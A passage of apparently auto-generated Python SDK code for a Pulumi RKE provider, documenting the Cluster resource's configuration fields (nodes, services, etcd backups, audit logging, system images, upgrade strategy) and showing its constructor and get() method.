* `mtu` (`pulumi.Input[float]`) - Network provider MTU. Default `0` (int)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `plugin` (`pulumi.Input[str]`) - Network provider plugin. `calico`, `canal` (default), `flannel`, `none` and `weave` are supported. (string)
* `weaveNetworkProvider` (`pulumi.Input[dict]`) - Weave network provider config (list maxitems:1)
* `password` (`pulumi.Input[str]`) - Registry password (string)
The **nodes** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `dockerSocket` (`pulumi.Input[str]`) - Docker socket on the node that will be used in tunneling (string)
* `hostnameOverride` (`pulumi.Input[str]`) - Hostname override for node (string)
* `internalAddress` (`pulumi.Input[str]`) - Internal address that will be used for components communication (string)
* `labels` (`pulumi.Input[dict]`) - Node labels (map)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `roles` (`pulumi.Input[list]`) - Node roles in k8s cluster. `controlplane`, `etcd` and `worker` are supported. (list)
* `rolesDeprecated` (`pulumi.Input[str]`)
* `ssh_agent_auth` (`pulumi.Input[bool]`) - SSH Agent Auth enable (bool)
* `sshCert` (`pulumi.Input[str]`) - SSH Certificate (string)
* `ssh_cert_path` (`pulumi.Input[str]`) - SSH Certificate path (string)
* `sshKey` (`pulumi.Input[str]`) - SSH Private Key (string)
* `ssh_key_path` (`pulumi.Input[str]`) - SSH Private Key path (string)
* `taints` (`pulumi.Input[list]`) - Node taints (list)
* `effect` (`pulumi.Input[str]`) - Taint effect. `NoExecute`, `NoSchedule` (default) and `PreferNoSchedule` are supported (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `value` (`pulumi.Input[str]`) - Taint value (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **private_registries** object supports the following:
* `isDefault` (`pulumi.Input[bool]`) - Set as default registry. Default `false` (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **restore** object supports the following:
* `restore` (`pulumi.Input[bool]`) - Restore cluster. Default `false` (bool)
* `snapshotName` (`pulumi.Input[str]`) - Snapshot name (string)
The **rotate_certificates** object supports the following:
* `caCertificates` (`pulumi.Input[bool]`) - Rotate CA Certificates. Default `false` (bool)
* `services` (`pulumi.Input[list]`) - Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
The **services** object supports the following:
* `etcd` (`pulumi.Input[dict]`) - Docker image for etcd (string)
* `backupConfig` (`pulumi.Input[dict]`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`pulumi.Input[float]`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`pulumi.Input[float]`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`pulumi.Input[dict]`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`pulumi.Input[str]`) - Access key for S3 service (string)
* `bucketName` (`pulumi.Input[str]`) - Bucket name for S3 service (string)
* `customCa` (`pulumi.Input[str]`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`pulumi.Input[str]`) - Endpoint for S3 service (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `secretKey` (`pulumi.Input[str]`) - Secret key for S3 service (string)
* `safeTimestamp` (`pulumi.Input[bool]`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`pulumi.Input[str]`) - TLS CA certificate for etcd service (string)
* `cert` (`pulumi.Input[str]`) - TLS certificate for etcd service (string)
* `creation` (`pulumi.Input[str]`) - Creation option for etcd service (string)
* `externalUrls` (`pulumi.Input[list]`) - External urls for etcd service (list)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `gid` (`pulumi.Input[float]`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`pulumi.Input[str]`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`pulumi.Input[bool]`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`pulumi.Input[float]`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
* `kubeApi` (`pulumi.Input[dict]`) - Kube API options for RKE services (list maxitems:1)
* `alwaysPullImages` (`pulumi.Input[bool]`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`pulumi.Input[dict]`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`pulumi.Input[dict]`) - Audit log configuration. (list maxitem: 1)
* `format` (`pulumi.Input[str]`) - Audit log format. Default: `json` (string)
* `maxAge` (`pulumi.Input[float]`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`pulumi.Input[float]`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`pulumi.Input[float]`) - Audit log max size. Default: `100` (int)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`pulumi.Input[str]`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`pulumi.Input[dict]`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`pulumi.Input[bool]`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`pulumi.Input[dict]`) - [Encrypt k8s secret data configuration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`pulumi.Input[str]`) - Service Node Port Range option for kube API service (string)
* `kubeController` (`pulumi.Input[dict]`) - Kube Controller options for RKE services (list maxitems:1)
* `cluster_cidr` (`pulumi.Input[str]`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `kubelet` (`pulumi.Input[dict]`) - Kubelet options for RKE services (list maxitems:1)
* `cluster_dns_server` (`pulumi.Input[str]`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`pulumi.Input[str]`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `failSwapOn` (`pulumi.Input[bool]`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` (`pulumi.Input[bool]`) - [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`pulumi.Input[bool]`)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `infraContainerImage` (`pulumi.Input[str]`) - Infra container image for kubelet service (string)
* `kubeproxy` (`pulumi.Input[dict]`) - Kubeproxy options for RKE services (list maxitems:1)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `scheduler` (`pulumi.Input[dict]`) - Scheduler options for RKE services (list maxitems:1)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_etcd_deprecated** object supports the following:
* `backupConfig` (`pulumi.Input[dict]`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`pulumi.Input[float]`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`pulumi.Input[float]`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`pulumi.Input[dict]`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`pulumi.Input[str]`) - Access key for S3 service (string)
* `bucketName` (`pulumi.Input[str]`) - Bucket name for S3 service (string)
* `customCa` (`pulumi.Input[str]`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`pulumi.Input[str]`) - Endpoint for S3 service (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `secretKey` (`pulumi.Input[str]`) - Secret key for S3 service (string)
* `safeTimestamp` (`pulumi.Input[bool]`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`pulumi.Input[str]`) - TLS CA certificate for etcd service (string)
* `cert` (`pulumi.Input[str]`) - TLS certificate for etcd service (string)
* `creation` (`pulumi.Input[str]`) - Creation option for etcd service (string)
* `externalUrls` (`pulumi.Input[list]`) - External urls for etcd service (list)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `gid` (`pulumi.Input[float]`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`pulumi.Input[str]`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`pulumi.Input[bool]`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`pulumi.Input[float]`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
The **services_kube_api_deprecated** object supports the following:
* `alwaysPullImages` (`pulumi.Input[bool]`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`pulumi.Input[dict]`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`pulumi.Input[dict]`) - Audit log configuration. (list maxitem: 1)
* `format` (`pulumi.Input[str]`) - Audit log format. Default: `json` (string)
* `maxAge` (`pulumi.Input[float]`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`pulumi.Input[float]`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`pulumi.Input[float]`) - Audit log max size. Default: `100` (int)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`pulumi.Input[str]`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`pulumi.Input[dict]`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`pulumi.Input[bool]`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`pulumi.Input[dict]`) - [Encrypt k8s secret data configuration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`pulumi.Input[str]`) - Service Node Port Range option for kube API service (string)
The **services_kube_controller_deprecated** object supports the following:
* `cluster_cidr` (`pulumi.Input[str]`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
The **services_kube_proxy_deprecated** object supports the following:
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_kube_scheduler_deprecated** object supports the following:
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
The **services_kubelet_deprecated** object supports the following:
* `cluster_dns_server` (`pulumi.Input[str]`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`pulumi.Input[str]`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `failSwapOn` (`pulumi.Input[bool]`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` (`pulumi.Input[bool]`) - [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`pulumi.Input[bool]`)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `infraContainerImage` (`pulumi.Input[str]`) - Infra container image for kubelet service (string)
The **system_images** object supports the following:
* `alpine` (`pulumi.Input[str]`) - Docker image for alpine (string)
* `calicoCni` (`pulumi.Input[str]`) - Docker image for calico_cni (string)
* `calicoControllers` (`pulumi.Input[str]`) - Docker image for calico_controllers (string)
* `calicoCtl` (`pulumi.Input[str]`) - Docker image for calico_ctl (string)
* `calicoFlexVol` (`pulumi.Input[str]`) - Docker image for calico_flex_vol (string)
* `calicoNode` (`pulumi.Input[str]`) - Docker image for calico_node (string)
* `canalCni` (`pulumi.Input[str]`) - Docker image for canal_cni (string)
* `canalFlannel` (`pulumi.Input[str]`) - Docker image for canal_flannel (string)
* `canalFlexVol` (`pulumi.Input[str]`) - Docker image for canal_flex_vol (string)
* `canalNode` (`pulumi.Input[str]`) - Docker image for canal_node (string)
* `certDownloader` (`pulumi.Input[str]`) - Docker image for cert_downloader (string)
* `coredns` (`pulumi.Input[str]`) - Docker image for coredns (string)
* `corednsAutoscaler` (`pulumi.Input[str]`) - Docker image for coredns_autoscaler (string)
* `dnsmasq` (`pulumi.Input[str]`) - Docker image for dnsmasq (string)
* `etcd` (`pulumi.Input[str]`) - Docker image for etcd (string)
* `flannel` (`pulumi.Input[str]`) - Docker image for flannel (string)
* `flannelCni` (`pulumi.Input[str]`) - Docker image for flannel_cni (string)
* `ingress` (`pulumi.Input[str]`) - Docker image for ingress (string)
* `ingressBackend` (`pulumi.Input[str]`) - Docker image for ingress_backend (string)
* `kubeDns` (`pulumi.Input[str]`) - Docker image for kube_dns (string)
* `kubeDnsAutoscaler` (`pulumi.Input[str]`) - Docker image for kube_dns_autoscaler (string)
* `kubeDnsSidecar` (`pulumi.Input[str]`) - Docker image for kube_dns_sidecar (string)
* `kubernetes` (`pulumi.Input[str]`) - Docker image for kubernetes (string)
* `kubernetesServicesSidecar` (`pulumi.Input[str]`) - Docker image for kubernetes_services_sidecar (string)
* `metricsServer` (`pulumi.Input[str]`) - Docker image for metrics_server (string)
* `nginxProxy` (`pulumi.Input[str]`) - Docker image for nginx_proxy (string)
* `nodelocal` (`pulumi.Input[str]`) - Docker image for nodelocal (string)
* `podInfraContainer` (`pulumi.Input[str]`) - Docker image for pod_infra_container (string)
* `weaveCni` (`pulumi.Input[str]`) - Docker image for weave_cni (string)
* `weaveNode` (`pulumi.Input[str]`) - Docker image for weave_node (string)
* `windowsPodInfraContainer` (`pulumi.Input[str]`) - Docker image for windows_pod_infra_container (string)
The **upgrade_strategy** object supports the following:
* `drain` (`pulumi.Input[bool]`) - RKE drain nodes. Default: `false` (bool)
* `drainInput` (`pulumi.Input[dict]`) - RKE drain node input (list Maxitems: 1)
* `deleteLocalData` (`pulumi.Input[bool]`) - Delete RKE node local data. Default: `false` (bool)
* `force` (`pulumi.Input[bool]`) - Force RKE node drain. Default: `false` (bool)
* `gracePeriod` (`pulumi.Input[float]`) - RKE node drain grace period. Default: `-1` (int)
* `ignoreDaemonSets` (`pulumi.Input[bool]`) - Ignore RKE daemon sets. Default: `true` (bool)
* `timeout` (`pulumi.Input[float]`) - RKE node drain timeout. Default: `60` (int)
* `maxUnavailableControlplane` (`pulumi.Input[str]`) - RKE max unavailable controlplane nodes. Default: `1` (string)
* `maxUnavailableWorker` (`pulumi.Input[str]`) - RKE max unavailable worker nodes. Default: `10%` (string)
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['addon_job_timeout'] = addon_job_timeout
__props__['addons'] = addons
__props__['addons_includes'] = addons_includes
__props__['authentication'] = authentication
__props__['authorization'] = authorization
__props__['bastion_host'] = bastion_host
__props__['cert_dir'] = cert_dir
__props__['cloud_provider'] = cloud_provider
__props__['cluster_name'] = cluster_name
__props__['cluster_yaml'] = cluster_yaml
__props__['custom_certs'] = custom_certs
__props__['delay_on_creation'] = delay_on_creation
__props__['dind'] = dind
__props__['dind_dns_server'] = dind_dns_server
__props__['dind_storage_driver'] = dind_storage_driver
__props__['disable_port_check'] = disable_port_check
__props__['dns'] = dns
__props__['ignore_docker_version'] = ignore_docker_version
__props__['ingress'] = ingress
__props__['kubernetes_version'] = kubernetes_version
__props__['monitoring'] = monitoring
__props__['network'] = network
__props__['nodes'] = nodes
__props__['nodes_confs'] = nodes_confs
__props__['prefix_path'] = prefix_path
__props__['private_registries'] = private_registries
__props__['restore'] = restore
__props__['rotate_certificates'] = rotate_certificates
__props__['services'] = services
__props__['services_etcd_deprecated'] = services_etcd_deprecated
__props__['services_kube_api_deprecated'] = services_kube_api_deprecated
__props__['services_kube_controller_deprecated'] = services_kube_controller_deprecated
__props__['services_kube_proxy_deprecated'] = services_kube_proxy_deprecated
__props__['services_kube_scheduler_deprecated'] = services_kube_scheduler_deprecated
__props__['services_kubelet_deprecated'] = services_kubelet_deprecated
__props__['ssh_agent_auth'] = ssh_agent_auth
__props__['ssh_cert_path'] = ssh_cert_path
__props__['ssh_key_path'] = ssh_key_path
__props__['system_images'] = system_images
__props__['update_only'] = update_only
__props__['upgrade_strategy'] = upgrade_strategy
__props__['api_server_url'] = None
__props__['ca_crt'] = None
__props__['certificates'] = None
__props__['client_cert'] = None
__props__['client_key'] = None
__props__['cluster_cidr'] = None
__props__['cluster_dns_server'] = None
__props__['cluster_domain'] = None
__props__['control_plane_hosts'] = None
__props__['etcd_hosts'] = None
__props__['inactive_hosts'] = None
__props__['internal_kube_config_yaml'] = None
__props__['kube_admin_user'] = None
__props__['kube_config_yaml'] = None
__props__['rke_cluster_yaml'] = None
__props__['rke_state'] = None
__props__['running_system_images'] = None
__props__['worker_hosts'] = None
super(Cluster, __self__).__init__(
'rke:index/cluster:Cluster',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, addon_job_timeout=None, addons=None, addons_includes=None, api_server_url=None, authentication=None, authorization=None, bastion_host=None, ca_crt=None, cert_dir=None, certificates=None, client_cert=None, client_key=None, cloud_provider=None, cluster_cidr=None, cluster_dns_server=None, cluster_domain=None, cluster_name=None, cluster_yaml=None, control_plane_hosts=None, custom_certs=None, delay_on_creation=None, dind=None, dind_dns_server=None, dind_storage_driver=None, disable_port_check=None, dns=None, etcd_hosts=None, ignore_docker_version=None, inactive_hosts=None, ingress=None, internal_kube_config_yaml=None, kube_admin_user=None, kube_config_yaml=None, kubernetes_version=None, monitoring=None, network=None, nodes=None, nodes_confs=None, prefix_path=None, private_registries=None, restore=None, rke_cluster_yaml=None, rke_state=None, rotate_certificates=None, running_system_images=None, services=None, services_etcd_deprecated=None, services_kube_api_deprecated=None, services_kube_controller_deprecated=None, services_kube_proxy_deprecated=None, services_kube_scheduler_deprecated=None, services_kubelet_deprecated=None, ssh_agent_auth=None, ssh_cert_path=None, ssh_key_path=None, system_images=None, update_only=None, upgrade_strategy=None, worker_hosts=None):
"""
Get an existing Cluster resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[float] addon_job_timeout: RKE k8s cluster addon deployment timeout in seconds for status check (int)
:param pulumi.Input[str] addons: RKE k8s cluster user addons YAML manifest to be deployed (string)
:param pulumi.Input[list] addons_includes: RKE k8s cluster user addons YAML manifest urls or paths to be deployed (list)
:param pulumi.Input[str] api_server_url: (Computed) RKE k8s cluster api server url (string)
:param pulumi.Input[dict] authentication: RKE k8s cluster authentication configuration (list maxitems:1)
:param pulumi.Input[dict] authorization: RKE k8s cluster authorization mode configuration (list maxitems:1)
:param pulumi.Input[dict] bastion_host: RKE k8s cluster bastion Host configuration (list maxitems:1)
:param pulumi.Input[str] ca_crt: (Computed/Sensitive) RKE k8s cluster CA certificate (string)
:param pulumi.Input[str] cert_dir: Specify a certificate dir path (string)
:param pulumi.Input[list] certificates: (Computed/Sensitive) RKE k8s cluster certificates (string)
:param pulumi.Input[str] client_cert: (Computed/Sensitive) RKE k8s cluster client certificate (string)
:param pulumi.Input[str] client_key: (Computed/Sensitive) RKE k8s cluster client key (string)
:param pulumi.Input[dict] cloud_provider: Calico cloud provider (string)
:param pulumi.Input[str] cluster_cidr: Cluster CIDR option for kube controller service (string)
:param pulumi.Input[str] cluster_dns_server: Cluster DNS Server option for kubelet service (string)
:param pulumi.Input[str] cluster_domain: Cluster Domain option for kubelet service. Default `cluster.local` (string)
:param pulumi.Input[str] cluster_name: RKE k8s cluster name used in the kube config (string)
:param pulumi.Input[str] cluster_yaml: RKE k8s cluster config yaml encoded. Provider arguments take precedence over this one (string)
:param pulumi.Input[list] control_plane_hosts: (Computed) RKE k8s cluster control plane nodes (list)
:param pulumi.Input[bool] custom_certs: Use custom certificates from a cert dir (string)
:param pulumi.Input[float] delay_on_creation: RKE k8s cluster delay on creation (int)
:param pulumi.Input[bool] dind: Deploy RKE cluster on a dind environment. Default: `false` (bool)
:param pulumi.Input[str] dind_dns_server: DinD RKE cluster dns (string)
:param pulumi.Input[str] dind_storage_driver: DinD RKE cluster storage driver (string)
:param pulumi.Input[bool] disable_port_check: Enable/Disable RKE k8s cluster port checking. Default `false` (bool)
:param pulumi.Input[dict] dns: RKE k8s cluster DNS Config (list maxitems:1)
:param pulumi.Input[list] etcd_hosts: (Computed) RKE k8s cluster etcd nodes (list)
:param pulumi.Input[bool] ignore_docker_version: Enable/Disable RKE k8s cluster strict docker version checking. Default `false` (bool)
:param pulumi.Input[list] inactive_hosts: (Computed) RKE k8s cluster inactive nodes (list)
:param pulumi.Input[dict] ingress: Docker image for ingress (string)
:param pulumi.Input[str] internal_kube_config_yaml: (Computed/Sensitive) RKE k8s cluster internal kube config yaml (string)
:param pulumi.Input[str] kube_admin_user: (Computed) RKE k8s cluster admin user (string)
:param pulumi.Input[str] kube_config_yaml: (Computed/Sensitive) RKE k8s cluster kube config yaml (string)
:param pulumi.Input[str] kubernetes_version: K8s version to deploy. If kubernetes image is specified, image version takes precedence. Default: `rke default` (string)
:param pulumi.Input[dict] monitoring: RKE k8s cluster monitoring Config (list maxitems:1)
:param pulumi.Input[dict] network: (list maxitems:1)
:param pulumi.Input[list] nodes: RKE k8s cluster nodes (list)
:param pulumi.Input[str] prefix_path: RKE k8s directory path (string)
:param pulumi.Input[list] private_registries: RKE k8s cluster private docker registries (list)
:param pulumi.Input[dict] restore: Restore cluster. Default `false` (bool)
:param pulumi.Input[str] rke_cluster_yaml: (Computed/Sensitive) RKE k8s cluster config yaml (string)
:param pulumi.Input[str] rke_state: (Computed/Sensitive) RKE k8s cluster state (string)
:param pulumi.Input[dict] rotate_certificates: RKE k8s cluster rotate certificates configuration (list maxitems:1)
:param pulumi.Input[dict] running_system_images: (Computed) RKE k8s cluster running system images list (list)
:param pulumi.Input[dict] services: Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
:param pulumi.Input[dict] services_etcd_deprecated: Use services.etcd instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_api_deprecated: Use services.kube_api instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_controller_deprecated: Use services.kube_controller instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_proxy_deprecated: Use services.kubeproxy instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_scheduler_deprecated: Use services.scheduler instead (list maxitems:1)
:param pulumi.Input[dict] services_kubelet_deprecated: Use services.kubelet instead (list maxitems:1)
:param pulumi.Input[bool] ssh_agent_auth: SSH Agent Auth enable (bool)
:param pulumi.Input[str] ssh_cert_path: SSH Certificate path (string)
:param pulumi.Input[str] ssh_key_path: SSH Private Key path (string)
:param pulumi.Input[dict] system_images: RKE k8s cluster system images list (list maxitems:1)
:param pulumi.Input[bool] update_only: Skip idempotent deployment of control and etcd plane. Default `false` (bool)
:param pulumi.Input[dict] upgrade_strategy: RKE k8s cluster upgrade strategy (list maxitems:1)
:param pulumi.Input[list] worker_hosts: (Computed) RKE k8s cluster worker nodes (list)
The **authentication** object supports the following:
* `sans` (`pulumi.Input[list]`) - List of additional hostnames and IPs to include in the api server PKI cert (list)
* `strategy` (`pulumi.Input[str]`) - Authentication strategy that will be used in RKE k8s cluster. Default: `x509` (string)
          * `webhook` (`pulumi.Input[dict]`) - Webhook configuration options (list maxitems:1)
* `cacheTimeout` (`pulumi.Input[str]`) - Controls how long to cache authentication decisions (string)
* `configFile` (`pulumi.Input[str]`) - Multiline string that represent a custom webhook config file (string)
The **authorization** object supports the following:
* `mode` (`pulumi.Input[str]`) - RKE mode for authorization. `rbac` and `none` modes are available. Default `rbac` (string)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
The **bastion_host** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
